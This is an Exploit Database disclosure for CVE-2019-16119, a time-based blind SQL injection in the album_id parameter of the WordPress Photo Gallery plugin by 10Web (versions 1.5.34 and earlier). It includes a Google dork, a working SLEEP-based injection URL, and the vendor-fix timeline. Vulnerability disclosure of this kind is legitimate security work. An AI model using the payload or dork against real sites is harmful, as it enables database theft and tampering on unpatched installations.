WordPress Plugin Photo Gallery 1.5.34 – SQL Injection

• Exploit Database
• 37 阅读

• 作者： MTK
  日期： 2019-09-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47371/

• # Exploit Title: WordPress Plugin Photo Gallery by 10Web <= 1.5.34 - Blind SQL injection
  # inurl:"\wp-content\plugins\photo-gallery"
  # Date: 09-10-2019
  # Exploit Author: MTK (http://mtk911.cf/)
  # Vendor Homepage: https://10web.io/
  # Software Link: https://downloads.wordpress.org/plugin/photo-gallery.1.5.34.zip
  # Version: Up to v1.5.34
  # Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows - SQLMap
  # CVE : 2019-16119
  
  # Software description:
  Photo Gallery is the leading plugin for building beautiful mobile-friendly galleries in a few minutes.
  
  
  # Technical Details & Impact:
  Through the SQL injection vulnerability, a malicious user could inject SQL code in order to steal information from the database, modify data from the database, even delete database or data from
  them.
  
  # POC
  In Gallery Group tab > Add new and in add galleries / Gallery groups. GET request going with parameter album_id is vulnerable to Time Based Blind SQL injection.Following is the POC,
  
  1. http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=<SQLi+HERE>&width=785&height=550&bwg_nonce=9e367490cc&
  
  2.http://127.0.0.1/wp-admin/admin-ajax.php?action=albumsgalleries_bwg&album_id=0 AND (SELECT 1 FROM (SELECT(SLEEP(10)))BLAH)&width=785&height=550&bwg_nonce=9e367490cc&
  
  
  # Timeline
  09-01-2019 - Vulnerability Reported
  09-03-2019 - Vendor responded
  09-04-2019 - New version released (1.5.35)
  09-10-2019 - Full Disclosure
  
  # References:
  Photo Gallery by 10Web – Mobile-Friendly Image Gallery
  
  https://plugins.trac.wordpress.org/changeset/2150912/photo-gallery/trunk/admin/controllers/Albumsgalleries.php?old=1845136&old_path=photo-gallery%2Ftrunk%2Fadmin%2Fcontrollers%2FAlbumsgalleries.php
  https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16119